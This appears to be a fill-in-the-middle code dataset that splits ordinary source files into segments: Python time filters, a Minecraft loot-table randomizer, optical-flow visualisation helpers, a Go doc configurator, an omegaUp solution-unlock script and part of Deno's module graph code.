return self._time_filter_equal_to_or_smaller_than_max_str
else:
raise ValueError(
"{} is not supported!".format(range_larger_smaller))
def make_dmp_filter(self, range_larger_smaller='R') -> Callable:
"""time filter generation function for dmp data.
When using this filter, the milestone for each transaction should be indicated.
Parameters
----------
range_larger_smaller (str) :
'R' for min < time < max
'm' for time > min
'M' for time < max
'E' for time = min
'RE' for min <= time <= max
'mE' for time >= min
'ME' for time <= max
Returns
----------
The built time filter.
"""
if range_larger_smaller == 'R':
return self._dmptime_range_filter_str
elif range_larger_smaller == 'm':
return self._dmptime_filter_larger_than_min_str
elif range_larger_smaller == 'M':
return self._dmptime_filter_smaller_than_max_str
elif range_larger_smaller == 'E':
return self._dmptime_euqal_filter_str
elif range_larger_smaller == 'RE':
return self._dmptime_range_with_euqal_filter_str
elif range_larger_smaller == 'mE':
return self._dmptime_filter_equal_to_or_larger_than_min_str
elif range_larger_smaller == 'ME':
return self._dmptime_filter_equal_to_or_smaller_than_max_str
else:
raise ValueError(
"{} is not supported!".format(range_larger_smaller))
| if milestone in MILESTONES_USING_TIMESTAMP_ONLY:
return timestamp
if attachmenttimestame != 0:
return attachmenttimestame/1000
else:
return timestamp |
loot_tables.py | import os
import json
import yaml
from typing import OrderedDict
from yaml.loader import FullLoader
from paths import RANDO_ROOT_PATH
class loot_tables:
def get_loot_tables(self, options):
|
def read_loot_tables(self, mob_loot_table_list, chest_loot_table_list):
self.loot_table_path = 'loot_tables'
self.mob_r_loot_tables = []
self.mob_s_loot_tables = []
self.chest_r_loot_tables = []
self.chest_s_loot_tables = []
self.patched_mob_loot_table_list = []
for m in mob_loot_table_list:
with (RANDO_ROOT_PATH / self.loot_table_path / 'entities' / m['file']).open('r') as mlt:
self.mob_loot_table = json.load(mlt)
self.mob_r_loot_tables.append(self.mob_loot_table)
if self.mob_loot_table == {}:
m['empty'] = True
else:
m['empty'] = False
self.mob_s_loot_tables.append(m['name'])
self.patched_mob_loot_table_list.append(m)
for c in chest_loot_table_list:
with (RANDO_ROOT_PATH / self.loot_table_path / 'chests' / c['file']).open('r') as clt:
self.chest_r_loot_tables.append(json.load(clt))
self.chest_s_loot_tables.append(c['name'])
return self.mob_r_loot_tables, self.mob_s_loot_tables, self.chest_r_loot_tables, self.chest_s_loot_tables, self.patched_mob_loot_table_list
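# For reference, get_loot_tables assumes loot_table_categories.yaml holds
# top-level 'entities' and 'chests' lists whose items carry 'name', 'file',
# 'type' and 'versions' keys. The concrete values in this sketch are
# illustrative, not taken from the real file.
#
#     entities:
#       - name: Zombie
#         file: zombie.json
#         type: hostile_mobs
#         versions: [1.16, 1.17]
#     chests:
#       - name: Desert Pyramid
#         file: desert_pyramid.json
#         type: dungeon
#         versions: [1.16, 1.17]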
def write_loot_tables(self, mob_loot_tables, mob_s_loot_tables, chest_loot_tables, chest_s_loot_tables):
self.mob_loot_tables_names = []
self.mob_loot_tables_files = []
self.chest_loot_tables_names = []
self.chest_loot_tables_files = []
for mlt in self.mob_loot_tables_list:
self.mob_loot_tables_names.append(mlt['name'])
self.mob_loot_tables_files.append(mlt['file'])
for clt in self.chest_loot_tables_list:
self.chest_loot_tables_names.append(clt['name'])
self.chest_loot_tables_files.append(clt['file'])
self.patched_mob_loot_tables = OrderedDict(zip(self.mob_loot_tables_files, mob_loot_tables))
self.spoiler_mob_loot_tables = OrderedDict(zip(self.mob_loot_tables_names, mob_s_loot_tables))
self.patched_chest_loot_tables = OrderedDict(zip(self.chest_loot_tables_files, chest_loot_tables))
self.spoiler_chest_loot_tables = OrderedDict(zip(self.chest_loot_tables_names, chest_s_loot_tables))
return self.patched_mob_loot_tables, self.spoiler_mob_loot_tables, self.patched_chest_loot_tables, self.spoiler_chest_loot_tables | with (RANDO_ROOT_PATH / 'loot_table_categories.yaml').open('r') as loot_tables:
self.loot_table_list = yaml.load(loot_tables, Loader=FullLoader)
self.randomized_mob_loot_table_list = []
self.unrandomized_mob_loot_table_list = []
self.randomized_chest_loot_table_list = []
self.unrandomized_chest_loot_table_list = []
for mob_lt in self.loot_table_list['entities']:
if options['version'] in [str(ver) for ver in mob_lt['versions']]:
if options['randomized_' + mob_lt['type']] == True:
self.randomized_mob_loot_table_list.append(mob_lt)
else:
self.unrandomized_mob_loot_table_list.append(mob_lt)
else:
continue
for chest_lt in self.loot_table_list['chests']:
if options['version'] in [str(ver) for ver in chest_lt['versions']]:
if options['randomized_' + chest_lt['type'] + '_chests'] == True:
self.randomized_chest_loot_table_list.append(chest_lt)
else:
self.unrandomized_chest_loot_table_list.append(chest_lt)
else:
continue
self.mob_loot_tables_list = self.randomized_mob_loot_table_list + self.unrandomized_mob_loot_table_list
self.chest_loot_tables_list = self.randomized_chest_loot_table_list + self.unrandomized_chest_loot_table_list
return self.randomized_mob_loot_table_list, self.unrandomized_mob_loot_table_list, self.randomized_chest_loot_table_list, self.unrandomized_chest_loot_table_list |
flow.py | import numpy as np
import cv2
def make_colorwheel():
'''
Generates a color wheel for optical flow visualization as presented in:
Baker et al. "A Database and Evaluation Methodology for Optical Flow" (ICCV, 2007)
URL: http://vision.middlebury.edu/flow/flowEval-iccv07.pdf
According to the C++ source code of Daniel Scharstein
According to the Matlab source code of Deqing Sun
'''
RY = 15
YG = 6
GC = 4
CB = 11
BM = 13
MR = 6
ncols = RY + YG + GC + CB + BM + MR
colorwheel = np.zeros((ncols, 3))
col = 0
# RY
colorwheel[0:RY, 0] = 255
colorwheel[0:RY, 1] = np.floor(255 * np.arange(0, RY) / RY)
col = col + RY
# YG
colorwheel[col:col + YG, 0] = 255 - np.floor(255 * np.arange(0, YG) / YG)
colorwheel[col:col + YG, 1] = 255
col = col + YG
# GC
colorwheel[col:col + GC, 1] = 255
colorwheel[col:col + GC, 2] = np.floor(255 * np.arange(0, GC) / GC)
col = col + GC
# CB
colorwheel[col:col + CB, 1] = 255 - np.floor(255 * np.arange(CB) / CB)
colorwheel[col:col + CB, 2] = 255
col = col + CB
# BM
colorwheel[col:col + BM, 2] = 255
colorwheel[col:col + BM, 0] = np.floor(255 * np.arange(0, BM) / BM)
col = col + BM
# MR
colorwheel[col:col + MR, 2] = 255 - np.floor(255 * np.arange(MR) / MR)
colorwheel[col:col + MR, 0] = 255
return colorwheel
def flow_compute_color(u, v, convert_to_bgr=False):
|
def flow_to_color(flow_uv, clip_flow=None, convert_to_bgr=False):
'''
Expects a two dimensional flow image of shape [H,W,2]
According to the C++ source code of Daniel Scharstein
According to the Matlab source code of Deqing Sun
:param flow_uv: np.ndarray of shape [H,W,2]
:param clip_flow: float, maximum clipping value for flow
:return:
'''
assert flow_uv.ndim == 3, 'input flow must have three dimensions'
assert flow_uv.shape[2] == 2, 'input flow must have shape [H,W,2]'
if clip_flow is not None:
flow_uv = np.clip(flow_uv, 0, clip_flow)
u = flow_uv[:, :, 0]
v = flow_uv[:, :, 1]
rad = np.sqrt(np.square(u) + np.square(v))
rad_max = np.max(rad)
epsilon = 1e-5
u = u / (rad_max + epsilon)
v = v / (rad_max + epsilon)
return flow_compute_color(u, v, convert_to_bgr)
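# Illustrative helper, not part of the original module: renders a synthetic
# flow field with flow_to_color as a quick visual sanity check of the color
# wheel. The output path is an assumption.
def demo_flow_to_color(out_path='flow_vis.png', size=256):
    # u grows left-to-right, v grows top-to-bottom
    xs = np.linspace(-1.0, 1.0, size, dtype=np.float32)
    u, v = np.meshgrid(xs, xs)
    flow_uv = np.dstack((u, v))  # shape [H, W, 2]
    color = flow_to_color(flow_uv, convert_to_bgr=True)
    cv2.imwrite(out_path, color)
    return color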
def readFlow(name):
f = open(name, 'rb')
header = f.read(4)
if header.decode("utf-8") != 'PIEH':
raise Exception('Flow file header does not contain PIEH')
width = np.fromfile(f, np.int32, 1).squeeze()
height = np.fromfile(f, np.int32, 1).squeeze()
flow = np.fromfile(f, np.float32, width * height * 2).reshape((height,
width, 2))
f.close()
return flow.astype(np.float32)
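# Hypothetical inverse of readFlow, included only to document the .flo layout
# the reader expects: 4-byte 'PIEH' magic, int32 width, int32 height, then
# float32 u/v pairs in row-major order. Not part of the original module.
def writeFlow(name, flow):
    assert flow.ndim == 3 and flow.shape[2] == 2, 'flow must have shape [H,W,2]'
    height, width = flow.shape[:2]
    with open(name, 'wb') as f:
        f.write('PIEH'.encode('utf-8'))
        np.array([width, height], dtype=np.int32).tofile(f)
        flow.astype(np.float32).tofile(f)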
def get_warp_label(flow1, flow2, label1, th=50, value=0):
label2 = np.ones_like(label1, dtype=label1.dtype) * value
height = flow1.shape[0]
width = flow1.shape[1]
flow_t = np.zeros_like(flow1, dtype=flow1.dtype)
grid = np.indices((height, width)).swapaxes(0, 1).swapaxes(1, 2)
dx = grid[:, :, 0] + flow2[:, :, 1]
dy = grid[:, :, 1] + flow2[:, :, 0]
sx = np.floor(dx).astype(int)
sy = np.floor(dy).astype(int)
valid = (sx >= 0) & (sx < height - 1) & (sy >= 0) & (sy < width - 1)
sx_mat = np.dstack((sx, sx + 1, sx, sx + 1)).clip(0, height - 1)
sy_mat = np.dstack((sy, sy, sy + 1, sy + 1)).clip(0, width - 1)
sxsy_mat = np.abs((1 - np.abs(sx_mat - dx[:, :, np.newaxis])) *
(1 - np.abs(sy_mat - dy[:, :, np.newaxis])))
for i in range(4):
flow_t = flow_t + sxsy_mat[:, :, i][:, :, np.
newaxis] * flow1[sx_mat[:, :, i],
sy_mat[:, :, i], :]
valid = valid & (np.linalg.norm(
flow_t[:, :, [1, 0]] + np.dstack((dx, dy)) - grid, axis=2) < th)
flow_t = (flow2 - flow_t) / 2.0
dx = grid[:, :, 0] + flow_t[:, :, 1]
dy = grid[:, :, 1] + flow_t[:, :, 0]
valid = valid & (dx >= 0) & (dx < height - 1) & (dy >= 0) & (dy < width - 1)
label2[valid, :] = label1[dx[valid].round().astype(int), dy[valid].round()
.astype(int), :]
return label2
def flow_tf(flow, size):
flow_shape = flow.shape
flow_resized = cv2.resize(flow, (size[1], size[0]))
flow_resized[:, :, 0] *= (float(size[1]) / float(flow_shape[1]))
flow_resized[:, :, 1] *= (float(size[0]) / float(flow_shape[0]))
return flow_resized | '''
Applies the flow color wheel to (possibly clipped) flow components u and v.
According to the C++ source code of Daniel Scharstein
According to the Matlab source code of Deqing Sun
:param u: np.ndarray, input horizontal flow
:param v: np.ndarray, input vertical flow
:param convert_to_bgr: bool, whether to change ordering and output BGR instead of RGB
:return:
'''
flow_image = np.zeros((u.shape[0], u.shape[1], 3), np.uint8)
colorwheel = make_colorwheel() # shape [55x3]
ncols = colorwheel.shape[0]
rad = np.sqrt(np.square(u) + np.square(v))
a = np.arctan2(-v, -u) / np.pi
fk = (a + 1) / 2 * (ncols - 1) + 1
k0 = np.floor(fk).astype(np.int32)
k0[k0 > 53] = 53
k1 = k0 + 1
k1[k1 == ncols] = 1
f = fk - k0
for i in range(colorwheel.shape[1]):
tmp = colorwheel[:, i]
col0 = tmp[k0] / 255.0
col1 = tmp[k1] / 255.0
col = (1 - f) * col0 + f * col1
idx = (rad <= 1)
col[idx] = 1 - rad[idx] * (1 - col[idx])
col[~idx] = col[~idx] * 0.75 # out of range?
# Note the 2-i => BGR instead of RGB
ch_idx = 2 - i if convert_to_bgr else i
flow_image[:, :, ch_idx] = np.floor(255 * col)
return flow_image |
configurator.go | // Copyright 2019 Xusixxxx Author. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License"); | //
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package config
import "time"
// Configurator instance
var Config Configurator
// Initialize the configurator
func init() {
Config = Configurator{
Name: "Xusi General Development Suite",
PackageHeader: "Xusi/xusi-framework",
Describe: `
<h3>欢迎查看 <kbd>xusi-framework</kbd> 项目文档</h3>
<footer>该文档由 <kbd>xusi-framework-xdoc</kbd> 自动化生成,为最近一次编译的最新版本文档。</footer>
`,
DescribeLabel: `
<p style="font-size:13px;">@Xusixxxx ( [email protected] )</p>
<p style="font-size:13px;">最后更新时间:` + time.Now().String()[:19] + `</p>
`,
}
}
/* XusiStrcut ->
@describe Configurator that controls some of xdoc's state
*/
type Configurator struct {
Name string // $describe Document name
PackageHeader string // $describe Document package header; affects import paths
Describe string // $describe Document description; HTML markup may be used
DescribeLabel string // $describe Document description label; HTML markup may be used
} // -< End | // you may not use this file except in compliance with the License.
// You may obtain a copy of the License at |
solution.ts | import Vue from 'vue';
import { OmegaUp } from '../omegaup';
import T from '../lang'; |
import problem_Solution from '../components/problem/Solution.vue';
OmegaUp.on('ready', () => {
const payload = types.payloadParsers.ProblemDetailsPayload();
const problemSolution = new Vue({
el: '#problem-solution',
render: function (createElement) {
return createElement('omegaup-problem-solution', {
props: {
status: this.status,
solution: this.solution,
allTokens: this.allTokens,
availableTokens: this.availableTokens,
},
on: {
'unlock-solution': () => {
api.Problem.solution(
{
problem_alias: payload.alias,
forfeit_problem: true,
},
{ quiet: true },
)
.then((data) => {
if (!data.solution) {
ui.error(T.wordsProblemOrSolutionNotExist);
return;
}
problemSolution.status = 'unlocked';
problemSolution.solution = data.solution;
ui.info(
ui.formatString(T.solutionTokens, {
available: problemSolution.availableTokens - 1,
total: problemSolution.allTokens,
}),
);
})
.catch((error) => {
if (error.httpStatusCode == 404) {
ui.error(T.wordsProblemOrSolutionNotExist);
return;
}
ui.apiError(error);
});
},
'get-tokens': () => {
api.ProblemForfeited.getCounts()
.then((data) => {
problemSolution.allTokens = data.allowed;
problemSolution.availableTokens = data.allowed - data.seen;
if (problemSolution.availableTokens <= 0) {
ui.warning(T.solutionNoTokens);
}
})
.catch(ui.apiError);
},
'get-solution': () => {
if (payload.solution_status === 'unlocked') {
api.Problem.solution(
{ problem_alias: payload.alias },
{ quiet: true },
)
.then((data) => {
if (!data.solution) {
ui.error(T.wordsProblemOrSolutionNotExist);
return;
}
problemSolution.solution = data.solution;
})
.catch((error) => {
if (error.httpStatusCode == 404) {
ui.error(T.wordsProblemOrSolutionNotExist);
return;
}
ui.apiError(error);
});
}
},
},
});
},
data: {
status: payload.solution_status || 'not_logged_in',
solution: <types.ProblemStatement | null>null,
allTokens: 0,
availableTokens: 0,
},
components: {
'omegaup-problem-solution': problem_Solution,
},
});
}); | import * as api from '../api';
import * as ui from '../ui';
import { types } from '../api_types'; |
module_graph2.rs | // Copyright 2018-2020 the Deno authors. All rights reserved. MIT license.
use crate::ast;
use crate::ast::parse;
use crate::ast::transpile_module;
use crate::ast::BundleHook;
use crate::ast::Location;
use crate::ast::ParsedModule;
use crate::colors;
use crate::diagnostics::Diagnostics;
use crate::import_map::ImportMap;
use crate::info::ModuleGraphInfo;
use crate::info::ModuleInfo;
use crate::info::ModuleInfoMap;
use crate::info::ModuleInfoMapItem;
use crate::js;
use crate::lockfile::Lockfile;
use crate::media_type::MediaType;
use crate::specifier_handler::CachedModule;
use crate::specifier_handler::Dependency;
use crate::specifier_handler::DependencyMap;
use crate::specifier_handler::Emit;
use crate::specifier_handler::FetchFuture;
use crate::specifier_handler::SpecifierHandler;
use crate::tsc2;
use crate::tsc_config::IgnoredCompilerOptions;
use crate::tsc_config::TsConfig;
use crate::version;
use crate::AnyError;
use deno_core::error::Context;
use deno_core::futures::stream::FuturesUnordered;
use deno_core::futures::stream::StreamExt;
use deno_core::serde::Serialize;
use deno_core::serde::Serializer;
use deno_core::serde_json::json;
use deno_core::serde_json::Value;
use deno_core::ModuleResolutionError;
use deno_core::ModuleSpecifier;
use regex::Regex;
use serde::Deserialize;
use serde::Deserializer;
use std::cell::RefCell;
use std::collections::HashMap;
use std::collections::HashSet;
use std::error::Error;
use std::fmt;
use std::path::PathBuf;
use std::rc::Rc;
use std::result;
use std::sync::Arc;
use std::sync::Mutex;
use std::time::Instant;
lazy_static! {
/// Matched the `@deno-types` pragma.
static ref DENO_TYPES_RE: Regex =
Regex::new(r#"(?i)^\s*@deno-types\s*=\s*(?:["']([^"']+)["']|(\S+))"#)
.unwrap();
/// Matches a `/// <reference ... />` comment reference.
static ref TRIPLE_SLASH_REFERENCE_RE: Regex =
Regex::new(r"(?i)^/\s*<reference\s.*?/>").unwrap();
/// Matches a path reference, which adds a dependency to a module
static ref PATH_REFERENCE_RE: Regex =
Regex::new(r#"(?i)\spath\s*=\s*["']([^"']*)["']"#).unwrap();
/// Matches a types reference, which for JavaScript files indicates the
/// location of types to use when type checking a program that includes it as
/// a dependency.
static ref TYPES_REFERENCE_RE: Regex =
Regex::new(r#"(?i)\stypes\s*=\s*["']([^"']*)["']"#).unwrap();
}
/// A group of errors that represent errors that can occur when interacting with
/// a module graph.
#[derive(Debug, Clone, Eq, PartialEq)]
pub enum GraphError {
/// A module using the HTTPS protocol is trying to import a module with an
/// HTTP schema.
InvalidDowngrade(ModuleSpecifier, Location),
/// A remote module is trying to import a local module.
InvalidLocalImport(ModuleSpecifier, Location),
/// The source code is invalid, as it does not match the expected hash in the
/// lockfile.
InvalidSource(ModuleSpecifier, PathBuf),
/// An unexpected dependency was requested for a module.
MissingDependency(ModuleSpecifier, String),
/// An unexpected specifier was requested.
MissingSpecifier(ModuleSpecifier),
/// The current feature is not supported.
NotSupported(String),
/// A unsupported media type was attempted to be imported as a module.
UnsupportedImportType(ModuleSpecifier, MediaType),
}
impl fmt::Display for GraphError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
GraphError::InvalidDowngrade(ref specifier, ref location) => write!(f, "Modules imported via https are not allowed to import http modules.\n Importing: {}\n at {}", specifier, location),
GraphError::InvalidLocalImport(ref specifier, ref location) => write!(f, "Remote modules are not allowed to import local modules. Consider using a dynamic import instead.\n Importing: {}\n at {}", specifier, location),
GraphError::InvalidSource(ref specifier, ref lockfile) => write!(f, "The source code is invalid, as it does not match the expected hash in the lock file.\n Specifier: {}\n Lock file: {}", specifier, lockfile.to_str().unwrap()),
GraphError::MissingDependency(ref referrer, specifier) => write!(
f,
"The graph is missing a dependency.\n Specifier: {} from {}",
specifier, referrer
),
GraphError::MissingSpecifier(ref specifier) => write!(
f,
"The graph is missing a specifier.\n Specifier: {}",
specifier
),
GraphError::NotSupported(ref msg) => write!(f, "{}", msg),
GraphError::UnsupportedImportType(ref specifier, ref media_type) => write!(f, "An unsupported media type was attempted to be imported as a module.\n Specifier: {}\n MediaType: {}", specifier, media_type),
}
}
}
impl Error for GraphError {}
/// A structure for handling bundle loading, which is implemented here, to
/// avoid a circular dependency with `ast`.
struct BundleLoader<'a> {
cm: Rc<swc_common::SourceMap>,
emit_options: &'a ast::EmitOptions,
globals: &'a swc_common::Globals,
graph: &'a Graph2,
}
impl<'a> BundleLoader<'a> {
pub fn new(
graph: &'a Graph2,
emit_options: &'a ast::EmitOptions,
globals: &'a swc_common::Globals,
cm: Rc<swc_common::SourceMap>,
) -> Self {
BundleLoader {
cm,
emit_options,
globals,
graph,
}
}
}
impl swc_bundler::Load for BundleLoader<'_> {
fn load(
&self,
file: &swc_common::FileName,
) -> Result<(Rc<swc_common::SourceFile>, swc_ecmascript::ast::Module), AnyError>
{
match file {
swc_common::FileName::Custom(filename) => {
let specifier = ModuleSpecifier::resolve_url_or_path(filename)
.context("Failed to convert swc FileName to ModuleSpecifier.")?;
if let Some(src) = self.graph.get_source(&specifier) {
let media_type = self
.graph
.get_media_type(&specifier)
.context("Looking up media type during bundling.")?;
transpile_module(
filename,
&src,
&media_type,
self.emit_options,
self.globals,
self.cm.clone(),
)
} else {
Err(
GraphError::MissingDependency(specifier, "<bundle>".to_string())
.into(),
)
}
}
_ => unreachable!("Received request for unsupported filename {:?}", file),
}
}
}
/// An enum which represents the parsed out values of references in source code.
#[derive(Debug, Clone, Eq, PartialEq)]
enum TypeScriptReference {
Path(String),
Types(String),
}
/// Determine if a comment contains a triple slash reference and optionally
/// return its kind and value.
fn parse_ts_reference(comment: &str) -> Option<TypeScriptReference> {
if !TRIPLE_SLASH_REFERENCE_RE.is_match(comment) {
None
} else if let Some(captures) = PATH_REFERENCE_RE.captures(comment) {
Some(TypeScriptReference::Path(
captures.get(1).unwrap().as_str().to_string(),
))
} else if let Some(captures) = TYPES_REFERENCE_RE.captures(comment) {
Some(TypeScriptReference::Types(
captures.get(1).unwrap().as_str().to_string(),
))
} else {
None
}
}
/// Determine if a comment contains a `@deno-types` pragma and optionally return
/// its value.
fn parse_deno_types(comment: &str) -> Option<String> {
if let Some(captures) = DENO_TYPES_RE.captures(comment) {
if let Some(m) = captures.get(1) {
Some(m.as_str().to_string())
} else if let Some(m) = captures.get(2) {
Some(m.as_str().to_string())
} else {
panic!("unreachable");
}
} else {
None
}
}
/// A hashing function that takes the source code, version and optionally a
/// user provided config and generates a string hash which can be stored to
/// determine if the cached emit is valid or not.
fn get_version(source: &str, version: &str, config: &[u8]) -> String {
crate::checksum::gen(&[source.as_bytes(), version.as_bytes(), config])
}
/// A logical representation of a module within a graph.
#[derive(Debug, Clone)]
struct Module {
dependencies: DependencyMap,
is_dirty: bool,
is_parsed: bool,
maybe_emit: Option<Emit>,
maybe_emit_path: Option<(PathBuf, Option<PathBuf>)>,
maybe_import_map: Option<Rc<RefCell<ImportMap>>>,
maybe_parsed_module: Option<ParsedModule>,
maybe_types: Option<(String, ModuleSpecifier)>,
maybe_version: Option<String>,
media_type: MediaType,
specifier: ModuleSpecifier,
source: String,
source_path: PathBuf,
}
impl Default for Module {
fn default() -> Self {
Module {
dependencies: HashMap::new(),
is_dirty: false,
is_parsed: false,
maybe_emit: None,
maybe_emit_path: None,
maybe_import_map: None,
maybe_parsed_module: None,
maybe_types: None,
maybe_version: None,
media_type: MediaType::Unknown,
specifier: ModuleSpecifier::resolve_url("file:///example.js").unwrap(),
source: "".to_string(),
source_path: PathBuf::new(),
}
}
}
impl Module {
pub fn new(
cached_module: CachedModule,
is_root: bool,
maybe_import_map: Option<Rc<RefCell<ImportMap>>>,
) -> Self {
// If this is a local root file, and its media type is unknown, set the
// media type to JavaScript. This makes it easier to create "shell"
// scripts with Deno.
let media_type = if is_root
&& !cached_module.is_remote
&& cached_module.media_type == MediaType::Unknown
{
MediaType::JavaScript
} else {
cached_module.media_type
};
let mut module = Module {
specifier: cached_module.specifier,
maybe_import_map,
media_type,
source: cached_module.source,
source_path: cached_module.source_path,
maybe_emit: cached_module.maybe_emit,
maybe_emit_path: cached_module.maybe_emit_path,
maybe_version: cached_module.maybe_version,
is_dirty: false,
..Self::default()
};
if module.maybe_import_map.is_none() {
if let Some(dependencies) = cached_module.maybe_dependencies {
module.dependencies = dependencies;
module.is_parsed = true;
}
}
module.maybe_types = if let Some(ref specifier) = cached_module.maybe_types
{
Some((
specifier.clone(),
module
.resolve_import(&specifier, None)
.expect("could not resolve module"),
))
} else {
None
};
module
}
/// Return `true` if the current hash of the module matches the stored
/// version.
pub fn is_emit_valid(&self, config: &[u8]) -> bool {
if let Some(version) = self.maybe_version.clone() {
version == get_version(&self.source, version::DENO, config)
} else {
false
}
}
/// Parse a module, populating the structure with data retrieved from the
/// source of the module.
pub fn parse(&mut self) -> Result<(), AnyError> {
let parsed_module =
parse(self.specifier.as_str(), &self.source, &self.media_type)?;
// parse out any triple slash references
for comment in parsed_module.get_leading_comments().iter() {
if let Some(ts_reference) = parse_ts_reference(&comment.text) {
let location = parsed_module.get_location(&comment.span);
match ts_reference {
TypeScriptReference::Path(import) => {
let specifier =
self.resolve_import(&import, Some(location.clone()))?;
let dep = self
.dependencies
.entry(import)
.or_insert_with(|| Dependency::new(location));
dep.maybe_code = Some(specifier);
}
TypeScriptReference::Types(import) => {
let specifier =
self.resolve_import(&import, Some(location.clone()))?;
if self.media_type == MediaType::JavaScript
|| self.media_type == MediaType::JSX
{
// TODO(kitsonk) we need to specifically update the cache when
// this value changes
self.maybe_types = Some((import.clone(), specifier));
} else {
let dep = self
.dependencies
.entry(import)
.or_insert_with(|| Dependency::new(location));
dep.maybe_type = Some(specifier);
}
}
}
}
}
// Parse out all the syntactical dependencies for a module
let dependencies = parsed_module.analyze_dependencies();
for desc in dependencies.iter().filter(|desc| {
desc.kind != swc_ecmascript::dep_graph::DependencyKind::Require
}) {
let location = Location {
filename: self.specifier.to_string(),
col: desc.col,
line: desc.line,
};
// In situations where there is a potential issue with resolving the
// import specifier, that ends up being a module resolution error for a
// code dependency, we should not throw in the `ModuleGraph` but instead
// wait until runtime and throw there, as with dynamic imports they need
// to be catchable, which means they need to be resolved at runtime.
let maybe_specifier =
match self.resolve_import(&desc.specifier, Some(location.clone())) {
Ok(specifier) => Some(specifier),
Err(any_error) => {
match any_error.downcast_ref::<ModuleResolutionError>() {
Some(ModuleResolutionError::ImportPrefixMissing(_, _)) => None,
_ => {
return Err(any_error);
}
}
}
};
// Parse out any `@deno-types` pragmas and modify dependency
let maybe_type = if !desc.leading_comments.is_empty() {
let comment = desc.leading_comments.last().unwrap();
if let Some(deno_types) = parse_deno_types(&comment.text).as_ref() {
Some(self.resolve_import(deno_types, Some(location.clone()))?)
} else {
None
}
} else {
None
};
let dep = self
.dependencies
.entry(desc.specifier.to_string())
.or_insert_with(|| Dependency::new(location));
dep.is_dynamic = desc.is_dynamic;
if let Some(specifier) = maybe_specifier {
if desc.kind == swc_ecmascript::dep_graph::DependencyKind::ExportType
|| desc.kind == swc_ecmascript::dep_graph::DependencyKind::ImportType
{
dep.maybe_type = Some(specifier);
} else {
dep.maybe_code = Some(specifier);
}
}
// If the dependency wasn't a type only dependency already, and there is
// a `@deno-types` comment, then we will set the `maybe_type` dependency.
if maybe_type.is_some() && dep.maybe_type.is_none() {
dep.maybe_type = maybe_type;
}
}
self.maybe_parsed_module = Some(parsed_module);
Ok(())
}
fn resolve_import(
&self,
specifier: &str,
maybe_location: Option<Location>,
) -> Result<ModuleSpecifier, AnyError> {
let maybe_resolve = if let Some(import_map) = self.maybe_import_map.clone()
{
import_map
.borrow()
.resolve(specifier, self.specifier.as_str())?
} else {
None
};
let specifier = if let Some(module_specifier) = maybe_resolve {
module_specifier
} else {
ModuleSpecifier::resolve_import(specifier, self.specifier.as_str())?
};
let referrer_scheme = self.specifier.as_url().scheme();
let specifier_scheme = specifier.as_url().scheme();
let location = maybe_location.unwrap_or(Location {
filename: self.specifier.to_string(),
line: 0,
col: 0,
});
// Disallow downgrades from HTTPS to HTTP
if referrer_scheme == "https" && specifier_scheme == "http" {
return Err(
GraphError::InvalidDowngrade(specifier.clone(), location).into(),
);
}
// Disallow a remote URL from trying to import a local URL
if (referrer_scheme == "https" || referrer_scheme == "http")
&& !(specifier_scheme == "https" || specifier_scheme == "http")
{
return Err(
GraphError::InvalidLocalImport(specifier.clone(), location).into(),
);
}
Ok(specifier)
}
/// Calculate the hashed version of the module and update the `maybe_version`.
pub fn set_version(&mut self, config: &[u8]) {
self.maybe_version = Some(get_version(&self.source, version::DENO, config))
}
pub fn size(&self) -> usize {
self.source.as_bytes().len()
}
}
#[derive(Clone, Debug, Default, Eq, PartialEq)]
pub struct Stats(pub Vec<(String, u128)>);
impl<'de> Deserialize<'de> for Stats {
fn deserialize<D>(deserializer: D) -> result::Result<Self, D::Error>
where
D: Deserializer<'de>,
{
let items: Vec<(String, u128)> = Deserialize::deserialize(deserializer)?;
Ok(Stats(items))
}
}
impl fmt::Display for Stats {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
writeln!(f, "Compilation statistics:")?;
for (key, value) in self.0.clone() {
writeln!(f, " {}: {}", key, value)?;
}
Ok(())
}
}
/// A structure that provides information about a module graph result.
#[derive(Debug, Default)]
pub struct ResultInfo {
/// A structure which provides diagnostic information (usually from `tsc`)
/// about the code in the module graph.
pub diagnostics: Diagnostics,
/// Optionally ignored compiler options that represent any options that were
/// ignored if there was a user provided configuration.
pub maybe_ignored_options: Option<IgnoredCompilerOptions>,
/// A structure providing key metrics around the operation performed, in
/// milliseconds.
pub stats: Stats,
}
/// Represents the "default" type library that should be used when type
/// checking the code in the module graph. Note that a user provided config
/// of `"lib"` would override this value.
#[derive(Debug, Clone, Eq, PartialEq)]
pub enum TypeLib {
DenoWindow,
DenoWorker,
UnstableDenoWindow,
UnstableDenoWorker,
}
impl Default for TypeLib {
fn default() -> Self {
TypeLib::DenoWindow
}
}
impl Serialize for TypeLib {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: Serializer,
{
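    // Each variant maps to the list of built-in lib names that ends up being
    // merged into the "lib" compiler option passed to tsc.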
let value = match self {
TypeLib::DenoWindow => vec!["deno.window".to_string()],
TypeLib::DenoWorker => vec!["deno.worker".to_string()],
TypeLib::UnstableDenoWindow => {
vec!["deno.window".to_string(), "deno.unstable".to_string()]
}
TypeLib::UnstableDenoWorker => {
vec!["deno.worker".to_string(), "deno.worker".to_string()]
}
};
Serialize::serialize(&value, serializer)
}
}
#[derive(Debug, Default)]
pub struct BundleOptions {
/// If `true` then debug logging will be output from the isolate.
pub debug: bool,
/// An optional string that points to a user supplied TypeScript configuration
  /// file that augments the default configuration passed to the TypeScript
/// compiler.
pub maybe_config_path: Option<String>,
}
#[derive(Debug, Default)]
pub struct CheckOptions {
/// If `true` then debug logging will be output from the isolate.
pub debug: bool,
/// Utilise the emit from `tsc` to update the emitted code for modules.
pub emit: bool,
/// The base type libraries that should be used when type checking.
pub lib: TypeLib,
/// An optional string that points to a user supplied TypeScript configuration
  /// file that augments the default configuration passed to the TypeScript
/// compiler.
pub maybe_config_path: Option<String>,
  /// Ignore any previous emits and ensure that all files are emitted from
/// source.
pub reload: bool,
}
#[derive(Debug, Eq, PartialEq)]
pub enum BundleType {
/// Return the emitted contents of the program as a single "flattened" ES
/// module.
Esm,
// TODO(@kitsonk) once available in swc
// Iife,
